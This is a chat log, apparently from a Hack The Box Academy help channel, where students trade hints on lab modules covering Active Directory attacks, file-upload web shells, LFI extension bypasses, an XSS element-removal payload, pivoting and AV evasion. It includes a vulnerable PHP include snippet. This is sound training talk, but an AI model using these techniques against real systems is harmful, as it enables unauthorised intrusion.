Haven't done the module, but having a look at it, it looks like if you compare the burp post request and response, you may find a clue on what html <tag> you should look for
Hey guys, for module: GPP Passwords, When I run the first command in powershell it says : it cannot be loaded because running scripts is disabled on this system.
Thank my friend
Nvm I guess I have to : Set-ExecutionPolicy
how can i reach htb support, please I'm stuck
I'm working my way through the first skills assessment in "Active Directory Enumeration & Attacks" and I'm doing something wrong in the process of trying to solve the fourth question. Without giving too much away, I get a scrolling DNS error message when I try to execute the command to get the answer, then my laptop crashes. I'm not using PwnBox and I've even checked the solution provided and followed the same steps - same result, DNS error & crash. Can Anyone give me a pointer?
im stuck on https://academy.hackthebox.com/module/145/section/1295
i got ports back from the ffuf 'scan' i had to do, but i cant connect to the ports. what do i do?
Hey, I'm currently going through the IMAP/POP3 section, trying to find the admin email address, i have openssl into the Server and used the credentials given - however i can't grasp how to get the email address from this can someone point me in the right direction?
use body[] instead of all in the imap fetch command
researching imap commands helps :)
any help with this ? Review the HTML source code of the page to find where the front-end input validation is happening. On which line number is it?
well look at the source code and look for any bit of validation of what's being typed in or uploaded or whatever it is you're doing
- what module are you doing
- if it's above tier 0 (and even then) don't share lab content -_-
lesson Injecting Commands , module Command injections
there's a line that contained regex, maybe that's the line :)
still not the right answer :/
yep it is
count from the declaration <!Doctype html>
still not right answer
or view in browser --> view page source
I done that too :/
well not sure how you're getting the wrong answer
you're very close
you have to include the doctype declaration in your counting
there's not much more information it can give you aside from having an inline comment on it that says "<!-- here's the validation -->"
I don't know where you see <! , I looked at every line and did not find it
sorry misspoke; i meant it'd be more obvious if it had the inline comment
but <!Doctype html> is where you start your line count (from 1)
I know , and still did not find the right answer
you're off by one earlier
still not
when you view source in browser there's handy line numbers next to the lines on the lefthand side
...
i am stuck at linux fundamentals
still not found
dm because this is ridiculous at this point

can anyone tell me why ssh is not connecting to terminal
empty lines still count as lines
<?php echo "example">
e
4 lines even though there's only 1 line of code;
(discord didn't like the empty lines >:( )
hi!
Stuck on the File Uploads Assessment.
Able to read the source, got the path, even uploaded the shell.
but getting 404
make sure you understand what the upload function is doing to your file
maybe try and replicate it in your own terminal (may have to slightly modify) using PHP -r
i.e. php -r <insert the code here> replacing function references to your upload with 'test' or something along those lines
yeah I tried to bypass by understanding the code. still somehow failed.
there's something that's functionally happening to your upload filename before it's uploaded
i believe it's near the top of the code that it happens
well it's formatting it a specific way
also spoilers
I saw it earlier, and tried with that name and path as well.
look into the command it's running
well, let me dive deeper.
https://onecompiler.com/php here's an online php compiler
just a quick one: Linux Privilege Escalation - docker. I have the flag. in the P.O.C they get the SSH key so they can remote in as the user. is this just to show us what is possible or can this be achieved on the box. I didn't want to chase a rabbit hole or break anything lol
Ok, so just to clarify: The task is NOT about trying to exploit the ticketing app, similar to ticketer, but rather just use some of the credentials being presented in the section??
correct; gaining access to an app via some credentials you harvested and utilizing search features within to find information
when you say "you harvested", is this exercise related to the previous exercises in the "Attacking Common Applications" or is it about using something from the text part? Sorry for being persistent but I am just confused
i thought i found the flag for the question on "Network Enumeration with Nmap | Nmap Scripting Engine" but it doesn't seem to be taking it as an answer? Could it be the wrong flag that's there from a different exercise?
all the info needed is on the page; i'm just generalizing the information
you may have found a flag for something else
some modules reuse the same lab over a couple sections
Also, I found that sometimes I need to log out to HTB and log in again to get the flag accepted, if my login session has been running over night. Worth trying.
Added in a screengrab of the error & have confirmed that PwnBox works as expected - so am assuming there is something wrong on the local laptop now.
no idea about the DNS-request issue tbh i don't recall needing to do anything like that
Hello one more question if i buy the subscription do i still pay cubes ?
Like I said, PwnBox works fine for the same process, so am assuming something has gone off track in my laptop.
monthly subs: yes as those allot x cubes per month (except student)
annual subs are access based:
Silver gives access to t2 and below modules
Gold gives access to t3 and below
well allot distribute
cubes don't expire
ok, so I'm trying to exploit the app, similar to|| the HTB box with osTicket ||, but am not succeeding, so am I overcomplicating it?
you may be overcomplicating it
there's credentials given in the section
you're not bruteforcing the user/pass on this
even the official solution (when i had access to it) says to use the sample creds given by the section
(imo annoying, but is what it is)
Ok thanks, already had tried all the creds without access, so thats why I started doubting what the exercise was about, and started trying to exploit it (which would have been more fun). I will try again, and if access is denied I'll raise it with support I guess (?)
make sure to try variations of the usernames with and without the @ domain
Thanks!
im going to assume not, Ill move on.
Now I'm really starting to get angry. None of the combinations works. This is not teaching me anything. This is pure frustration. whats the point of this exercise???? And which is the combination? I am getting locked out after a few attempts, then have to respawn and try the same again, just to be locked out
should be k*
ok, I'll give it one more try. Thanks for responding!
make sure you're signing into the ||agent portal||
worked for me
[not included is username for what should be obvious reasons]
Thanks, I'll go again. Once again, really appreciate you responding.
any online support here?
As a benefit of my initial confusion, I got to read up on osTicket exploits, and try some out, so thanks to that I actually learnt. Now, everything good. Sorry for getting frustrated and appreciate your patience.
There is no support on discord - only on the site.
I am having an issue: Exploiting Web Vulnerabilities in Thick-Client Applications
I cannot get the fatty-client-new.jar app to open after recompiling it
I have reached out to support and they said check here. Has anyone had this issue
Hi guys, i've been stuck for a while in the information gathering module, i solved the issue, but i have a doubt on what is the difference between ffuf and gobuster for Virtual host fuzzing, cause i noticed ffuf gives like every word in the wordlist as a possible vhost, this way it doesn't sound much useful, i was wondering if i missed something on how to use it
I hate my life
I got this , Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file? , I tried via Burp Suite and didn't show anything but errors
how should I proceed?
module , Command Injections , lesson Bypassing Space Filters
The module has it
can someone help me with Intro to C2 Operations with Sliver -> SA-> Q4. I have completely looted SRV09 and now I need to abuse the domains trust somehow. I guess I need to make a diamond or gold ticket, I have done both but I can't access DK01. Can someone in DM check if I am doing this correctly or if I am missing something?
I spent hours on it
Likely, you are trying to compile those .java files src folder straight away into .jar. I believe the correct way is to convert the specific edited one back to .class, replace the relevant original fatty client .class and then compile that folder with all.class files to get the .jar
Provided - you have done the earlier steps correctly
Anyone able to give some hints on Advanced SQL Injection Skill Assessment - RCE? I think my script is good enough, but I suppose that there is a missing part with user privileges for creating the function... cannot find the solution... I am stuck
Module> Getting Started- Public Exploits. The question is asking for flag. After running NMAP I only see SSH and rpcbind open. Scan for exploits using searchsploit and metasploit. Find a few but doesn't appear to be the right direction. Look at the solution and the first thing they have you do is open a web browser. Why? This port didn't appear up and nmap shows http closed despite the webpage loading, why?
the port given is the web port as you're given a public_ip:port; when you're given a target in that format your only scope is the ip:port
http doesn't have to be 80
LDAP AD Module
It says this command then i use it and it doesnt work.
And zero AD commands work...
Any help as to why it cant reach the AD server ?
Its evil win rm, it could be Kerberos double hop problem. Although, I'm not sure
What should I use to connect CLI then
Use different characters in ESSID Stripping.
Not 100% sure it is the case but you can try passing your creds along, or even try RDP if its open
pscredential
Hello folks I just needs help
help with what?
I am reaching a point where it said I should create a ngrok account and get auth token to run to create payload
what module is that for?
Thank you! I figured it out at the end. I was still unable to ssh or rdp into the Kali, but for the purposes of this lab, once I restarted my computer and re-did everything, the remote desktop from bob worked.
for what academy module? as far as I know there's no academy module for android maldev
this channel isn't for help with random maldev stuff if you wanna read and follow #welcome you'll have access to more of the server
but it sounds like what you're working on is unrelated to htb academy
It's just a part of learning and not something else I am cybersecurity student
This channel is about the modules in the HTB Academy. Verify your user to use better channels for your question
tried a bunch eventually happened completely random after a vm restart
The other 2 are just as straightforward as they seem?
Hey @acoustic owl since u are here i wanna ask u, did u delve into exploit development and process injections? If so what did u do / learn
No, I haven't dealt with it yet
sounds like a scam took place but there's nothing we can do about it; you'd have to reach out to authorities
Ye that's what happened.
but as stated: this server isn't a hacker4hire server or anything like that
Second and third are easy. I am having problems with first task. Captured handshake, but cannot install apache for capture portal setup.
no but ive done a couple mentioned in the course
ask
Hi guys, I'm in the ADVANCED SQL INJECTIONS Module Skill assesments - Questions 2:
I could get the user and now I'm struggling with RCE, I can tell you what I've tried so far.
||I got pg_sleep but I noticed that I do not have superuser privileges, then I'm trying to grant privileges for it but nothing is working.|| Am I in the right path?
Please help, I'm very tired of this module, very hard tbh
Hello Everyone
After finishing the Bug Bounty Hunter Path of the CBBH Cert, what other HTB Academy modules or external resources would you recommend to deepen my knowledge in web security?
Go for CWEE
thank you
Anyone else having issues rdp-ing into Evasion Dev on Windows Evasion Module Introduction section? Can rdp to Evasion Target just fine
having issues interacting with target machines in general in academy right now. started about an hour ago for me.
having trouble on both pwnbox and VPN connection.
Alright so I'm not alone. It was driving me nuts and gave up for the day.
Need some help? Learn how to reach the support team on Academy.
i haven't done that module
Hi folks, currently doing the AEN module blindly. I got DA, but there was a second NIC, so I pivoted again and found a host with SSH open. Is there something more to it, or the guide basically has creds for going in getting another flag?
You missed something
Heyyyyy
Why cant I talk in general
#welcome look under Verification
is it a ||UDP port|| on that host? Or am I missing a completely different host here?
there are common things you didnt check after DA
not what you said
I got it now, thanks. This was kinda easy, I expected a lot more on the second pivot
I have a question about Intro to Window Evasion module. The way it designs is to upload payload on the target machine, open netcat and automatically will get revshell after waiting couple minutes.
How.... does that happens?
If i decide to do it on another box, can i just wait for the revshell to trigger too ?
there's a program running that checks every 30s or minute i forget which. and no, if you spawned another target box on another section it would kill your current target.
yea, i was tryna do it on another box. when i trigger exe, it ask for dll file, when i upload both exe and dll file, i got result like...
||Architecture: x64
App host version: 6.0.10
.NET location: Not found
Learn about runtime installation:
https://aka.ms/dotnet/app-launch-failed
Download the .NET runtime:
https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=x64&rid=win10-x64&apphost_version=6.0.10||
so how.... can i utilize what i learn from that module to the other lab? that is my main question
it's teaching you how to evade the av software
so when you attack boxes your payloads aren't flagged
You didn't compile it statically as a .NET program.
Hey everyone, I'm in the Windows Attacks and Defense and my RDP into the target/bob keeps on dropping. Anyone else at the same point and experiencing an issue? I've been troubleshooting for 2 days now, and can't figure out what's going on. I managed to work for a couple of hours earlier today without interruptions, but I'm stuck again. The window connects and Windows desktop pops up for a few seconds, then disconnects again.
Have you tried swapping to a TCP vpn?
i have
Welp that's my one bullet 
I get "Host key for [ip] has changed and you have requested strict checking."
anyone encounter host key issue? how are there so many lab issues I get time to sit down and study I can't even study
nope
you aren't on the vpn with the pwnbox powered up at the same time, are you?
nope
are there any mods or student mentor I can ping?
oh you are mod Hi @cloud urchin
what is the host key issue?
i think this is the answer for my problem, thank you so much
I just spammed it three different times, now I'm finally in and usually it crashes. I'll see if it stays on and I can RDP to the next box
your ssh client stores the host key based on the hostname/IP pair in ~/.ssh/known_hosts, sounds like you've respawned the target and it has a new ip. you need to remove the old hostkey and then reconnect.
you can't have the pwnbox and the VPN on at the same time, they both share the same IP and it will cause connectivity issues
understood - i do not use the pwnbox at all, im only using ovpn
i've noticed some servers are worse than others, if RDP is unbearably slow try changing servers or maybe even regions.
also use the TCP VPN instead of UDP as it's more stable
All you need to know about the VPN Connection for Academy
you could also try adjusting the MTU as described in the link I provided above
Hey guys, how are you? I have a little problem with a question in the password cracking module in the network services section, where I was trying to crack the RDP password but it doesn't find it.
I have the same VPN with which I did the WinRM and SSH one where I found them easily, I tried to contact support but they couldn't give me a solution and they told me that the server works fine and to ask here on discord
are you using the provided username and password lists from the resources section?
Yeah
Sorry for the spoiler, I didn't realize.
review your command vs what is shown in the module
it wasn't the same as what i see
At the beginning I used the same command, but it didn't work, so I added things to see if it improved the results.
I even tried with netexec to see if I had a different result and it didn't work either.
ok let me try
Perfect, I'll be waiting, thank you very much.
I'll put the same commands and in 10 minutes or so I'll show you.
ok DM me
There I have written to you
Hello guys I can't access the XSS Hijacking Session because the target doesn't have a port? ip:port should be like this but mine only has an ip of target.
did you try the standard web ports?
yeah if the target doesn't spawn with a port you'll need to be on the vpn to access it
Anyone able to give some hints on Advanced SQL Injection Skill Assessment - RCE? I think my script is good enough, but I suppose that there is a missing part with user privileges for creating the function... cannot find the solution... I am stuck
do some targets in academy have lower resolution? Just did an RDP on one of the targets (parrot OS) even looking at the display settings there is no option to increase the resolution. I am using remmina
Hello,
I'm still fighting the "Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01"
I have working proxy, credentials and tool to begin an attack but all i get is a timeout error
Other tools are working fine with proxy, so i don't know why this one is getting time out, i've check the port by powershell on jump-host and everythings seems open to attack
This is : AD Enumeration & Attacks - Skills Assessment Part I
should be an option in remmina for screen resizing, but yeah some just have weird resolutions
as far as i've known, the icon in the middle toggles dynamic resolution. And it's unavailable. But the important thing is I finished the part with low resolution lol
In client there is Use client resolution
It helps, but i found a bug when you make the initial connection with RDP it cant connect with client res
so initial connect is with initial window size, the second connection is with client resolution
and everything works just fine
also there is a option in xfreerdp /dynamic-resolution that helps a lot
by client, you mean the linux or the OS you're using?
OH, the remmina
in the new connection profile, you need to scroll down a lil
and there are the resolution options
so if the remmina creates a windows, it changes resolution on fly
that just goes to show I haven't explored this tool lol. You are a lifesaver @willow furnace configured it to use client resolution. But I am currently in an RDP session so maybe this might take effect next session
"Hey everyone, I'm new to the world of ethical hacking and still have a lot to learn. I don't have much experience yet, and all I have right now is my phone. Could anyone guide me on how I can start learning and what resources I should focus on? Any advice would be greatly appreciated!"
What can i add is that connection Parrot -> jump-host is just fine, Then proxy to DC is not working. Even -Pn with nmap shows nothing
I can ping DC from jumphost, but the proxy from parrot is getting timeouted
Hiii people , I'm new to ethical hacking and still have a lot to learn. I don't have much experience yet, and all I have right now is my phone and laptop elite book. Could anyone guide me on. Im also learning from cybrary. But someone told me its not much practical. Any guidance??
FOR ANYONE STRUGGLING WITH THIS ONE:
-> the attack on Domain Controller will be infinitely harder with proxy, so there is another way
-> take a look at one of the host in the corp network, maybe you can figure something with remote desktop stuff
-> at the host, if you have previous puzzles it will be so much easier to solve it
dude @willow furnace you're also on AD enum and attack module?
yessir
on the Assessment part rn
just started this module and the slow response from the rdp frustrates me so I setup a proxy
I'm curious what proxy are you using btw?
chisel, it works just fine
It needs to be downloaded on both machines right (assuming that the target has it already)
I used ligolo so that I'll just transfer the agent via pyserver or ssh
the setting up of the tunnel is the annoying part
the parrot os have 1.10.0 ver so be aware of that
the newest one is 1.10.1
is this the target?
the pwnbox
most of the time you need to upload the second chisel to target
hmm how will I know what version of parrot is the pwnbox?
the pwnbox is the VM that they give you
idk if you are using theirs VMs or your own Kali/Parrot/distro
oh nvm found it
It's 5.0
I use my own VM (kali) then just openvpn to the pwnbox (or target)
but ligolo works well also in this version. I just configured the agent because there's a missing GLIBC on the target
Hello, I finished Footprinting's Hard assessment, and I have a few questions on one of the steps to find the flag, is anyone available for a quick mp?
Have a good day
just ask the question
try not to be too revealing though
It's about one of the steps to the flag, so I would be spoiling
ok fair enough, sent a friend request so you can DM me
Hi, I have some questions regarding proxychains..
So I have already added the IP and the domain name into /etc/hosts file. however i keep getting this error
is there something i am missing?
Looks like it's tryna go through DNS, there should be a setting in your proxychains.conf that you can uncomment
It is already uncommented though
... found the issue
I'm a bit confused, why is it reading from this file instead of proxychains.conf
Cos you're passing in a domain name instead of an IP it tries to resolve that domain name through the specified DNS
So am i right to say that, if i want to connect to the target, i should be putting the target's dns IP?
gimme 2 mins I'm actively looking for an old pdf with notes on precisely this
alright, my other question is, do i have to re-establish my chisel connection if i changed my settings?
you need their actual ip not their dns resolver
asking this because im doing an assessment that only allows chisel connections, otherwise i would have used ligolo
chisel is not dns dependent
the only time chisel is relevant is if your server is set up on a domain rather than an ip
Welp can't find the notes 
Actually might have to comment this line
Well it's hitting Kerberos port so...
i placed nameserver 172.16.15.3 into resolv.conf
earlier it kept looking for 1.1.1.1 then the 4.2.2
seems about right depending on your resolv config
Yeah this is probably the way to go...
then again: Ligolo-ng
it kept searching for INLANEFREIGHT.LOCAL at 1.1.1.1:53
then i was like, bruh, why you looking for 1.1.1.1 at port 53
I'll try doing this later
can someone help me with Intro to C2 Operations with Sliver -> SA-> Q4. I have completely looted SRV09 and now I need to abuse the domains trust somehow. I guess I need to make a diamond or gold ticket, I have done both but I can't access DK01. Can someone in DM check if I am doing this correctly or if I am missing something?
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:c1:89:90:7f:fd:4f:60:e0:54:f3:85:e6:35:6c:2b (RSA)
| 256 e1:8e:53:18:42:af:2a:de:c0:12:1e:2e:54:06:4f:70 (ECDSA)
|_ 256 1a:cc:ac:d4:94:5c:d6:1d:71:e7:39:de:14:27:3c:3c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
it say wrong answer
Which module is this from?
nmap
Did you try just putting the version number?
ahh you are in the last skill assessment, you must verify well all the ports that are there (obviously bypassing the firewall)
can u show me how i even scripted but no use
You should reread the content of firewall evasion, I can only tell you that you must list everything
..... ok will read again

If I remember correctly, the module shows you other ways to determine the service
Hi all, in the Shells and Payloads skill assessment the second host requires credentials to log in to progress with the tasks. I have checked the host-2 hint which gives the credentials but I was wondering is there another way to find them without the hint?
hey
I'm doing the Wi-Fi module and I can't get this question:
Check the driver capabilities for the interface. How many software interface modes are available? (Answer in digit format: e.g., 3)
I used the iw list and get the " Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* mesh point
...."
etc
But when I send the quantity that is in "Supported interface modes" of the "iw list" command, it is not showing as correct.
Hey everyone,
I'm having some issues running Responder through a Ligolo pivot.
Here's the situation:
I'm using Ligolo to pivot into a network.
I tried running Responder on my attacker machine through the Ligolo tunnel, but it's not capturing anything.
However, when I ran Responder directly on the target machine (which is a Linux box), it did capture some traffic successfully.
I'm not sure what I'm missing - maybe a routing issue or something else.
Has anyone faced this before or knows how to fix it? Any help would be appreciated!
Thanks in advance!
GOT IT
is secure coding module really worth 1000 cubes?
just a quick question when you finish a module is it possible to go back and review just asking since im on the fundamentals to linux and most of the commands are confusing to me right now
yes, it stays unlocked and you can view it anytime
How can I bypass appended file extension in lfi
My code look like
include($_GET ['file'] . ".php")
I try using php filters but not work
I try null byte and truncation but not work since the version of php is 8.3
So how can I bypass it?
Hi
If I remember correctly, Null Byte only works up to PHP 5.3. All versions above have fixed this vulnerability. A bypass is no longer possible
guys i could rlly use some help here :
if i want to start bug bounty should i get penetration tester path or bug bounty hunter? and which one is the deep in information
bug bounty hunter
cause the cpts path include ad networking etc...
thank you
u welcome : )
anyone can assist me with cbbh path issue im facing ?
- 1 Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.
---- got this question and answered this : mail1.inlanefreight.com
but still facing wrong answer
I was working on cpts path, footprinting module specific, while working on smtp enum it asked me about username on the smtp, so i did enumeration and some nmap scripts and metasploit and it did provide me users, but none of that worked, realized the user was far away from those and kinda unique, is the mistake from the lab or what exactly?
Ok thx for the reply
this is the target an i can't acces the web page : Target(s): 10.129.109.119 (ACADEMY-XSS-ASMT)
i am in the xss module the easy one in phishing section
Hello guys. I don't see a spot specifically to ask about retired labs, so I'm going to post a quick (simple) question here: When I try to use ldapsearch, I keep getting the full help options when I dont want it. Is it a syntax error?
ldapsearch -h 10.10.10.161 -p 389 -x -b "dc=htb,dc=local"
The IP address is correct and live (I can ping it) and the domain is htb.local
Are you connected to the VPN and can you ping the target?
And to clarify: The output I get from the above is the help list (as if I typed: ldapsearch --help)
I think this is under the HTB: Platform section, if you can't see it you need to follow the instructions in #welcome
ok
not connected to vpn
```
PING 10.129.109.119 (10.129.109.119) 56(84) bytes of data.
From 81.192.249.78 icmp_seq=1 Time to live exceeded
From 81.192.249.78 icmp_seq=3 Time to live exceeded
From 81.192.249.78 icmp_seq=4 Time to live exceeded
From 81.192.249.78 icmp_seq=6 Time to live exceeded
From 81.192.249.78 icmp_seq=7 Time to live exceeded
From 81.192.249.78 icmp_seq=8 Time to live exceeded
^C
--- 10.129.109.119 ping statistics ---
8 packets transmitted, 0 received, +6 errors, 100% packet loss, time 7088ms
```
are you using the pwnbox?
if you are not using the PwnBox, you need the VPN connection to access the HTB network
no my terminal
As PayloadBunny said, you must connect to the VPN to access the HTB network and reach your target
you have to use either the pwnbox or the VPN, but make sure not to use both at the same time as they share the same IP so it will cause connectivity problems.
thankss
@carmine delta please make sure not to post spoiler content from the modules
anything above t0 isn't allowed
ok where should i ask for help
you can ask here just don't post content from the module, you could ask for someone in dm if you need to give more details.
i believe you need to be hacker or higher on the main platform, make sure to link your HTB account by following the instructions in #welcome.
This channel is for discussion of the various modules on HTB's Academy platform, you can just ask your question here if that's what your image is about, otherwise this isn't the right place for it.
Ok il ask but i dont think it would be understanding
So i used cURL into ip adress HTB gave me with /download.php path just like it said i got the flag, looks like a flag but it says that its incorrect
Idk ehat to do
may not be the flag then, but if it is make sure you don't have any whitespaces or extra characters. maybe try manually typing it out.
@carmine delta it looks to me like it's because the way you're trying to call to the entity reference and how the xml parser expects it to be a standalone entity reference. i don't believe concatenating the email before the entity reference is valid content so it doesn't work. also please don't post spoiler content from anything above t0.
ok thanks, I don't think it's a spoiler and then my payload doesn't even work
Hello anyone did the process injection module ?
ask your question properly
Well im wondering in the module do you use any tooling to automate injections or are we writing the code for every single method?
anyone has an idea?
of course you're writing the code, that's the whole point of the module
the lab is fine
it's just not a straight forward enumeration exercise
Can anyone help with why I cant get windapsearch to work?
you're using -h. That's the help flag. You probably want to be using -H.
You need to install dependencies. pip install ldap or apt install python-ldap
It failed to do so look at the 2nd image
install libldap2-dev
source: https://stackoverflow.com/questions/4768446/i-cant-install-python-ldap
so just need big wordlist?
Update the packages first
no, there's no logic in that
Wow thanks.. Did u just google the error ?
im in the footprinting module
when i wanna download "Important Notes.txt" I need to write get Important\Notes.txt ?
But why ? Isnt there any other way like: get 'Important Notes.txt'
Anyone able to give some hints on Advanced SQL Injection Skill Assessment - RCE? I think my script is good enough, but I suppose that there is a missing part with user privileges for creating the function... cannot find the solution... I am stuck
wrapping in quotes should work
@sand sedge please don't post spoilers for modules above tier 0 :)
kkk but how i can tell someon my problem
By simply stating that it doesn't appear to be getting removed, someone that's done the module can request to dm so that you can troubleshoot it there
hello can anyone help me in the web services and api attacks skills assessment, stuck for days already
Without knowing your full payload, no. Just mess around a bit until you get it
payload is : document.getElementById('urlform').remove(); , when add an element it's added but when trying to rem the urlform it is not removed
btw the payload mentioned in the section not from my own
You need to escape where it's injected first
how can i bc if i do an <!-- i can not inject something how i can escape it
i don't have control over the page
Look where the payload is injected
Escaping isn't just about inserting arbitrary html comments
ahhh i see thanks alot
Any Assembly language wizard here - I struggle with a question from Introduction to Assembly Language - Unconditional Branching.
I have confirmed the answer with AI etc. I am 100% sure I have the right answer, but I can't pass it.
**Try to jump to "func" before "loop loop". What is the hex value of "rbx" at the end?**
the conditional instruction added makes the rbx value unchanged - so it should have the value of the initialised one - GDB debugging also confirms it. What is wrong with my thinking?
Hello, did someone have a few problem installing/using the pth-toolkit ? Can I dm someone ?
if rbx isn't unchanged, then something changed it
hello can anyone help
web api attacks skills assessment
yeah dm
wait which one
web services?
or the other api attacks
the other onee,
"Web Service & API Attacks"
the one with SOAP and WSDL
yeah dm
thanks!! sent
anyone else seem to have issues getting reverse shells on kali to work when connected to the VPN? it works fine in pwnbox but when i try on my VM it wont work. Im using the ip address from tun0 but netcat never gets any connection. its super annoying
doing the file uploads module
when i directly put in my tun0 address into my web browser i get an http request in netcat so i know its the right address, iptables looks to be fine but im not quite sure
Don't use them both at the same time they use the same IP address
try swapping to TCP vpn
k one sec
still nothing
can i DM you my ip tables rules, wondering if im missing a forward request
and im not using both at once, tried it on vm didn't work, then killed the vpn connection and tried pwnbox and it worked lol
so weird
which section of file uploads is this btw?
Can you try it on one of the sections where a direct shell/interface on the target is provided?
web shells, specifically pentestmonkey
just check if you can access the webserver through the target's browser/curl
yeah that works
Therefore it's not an ip tables rule issue
i can access everything outgoing, but not incoming
wdym?

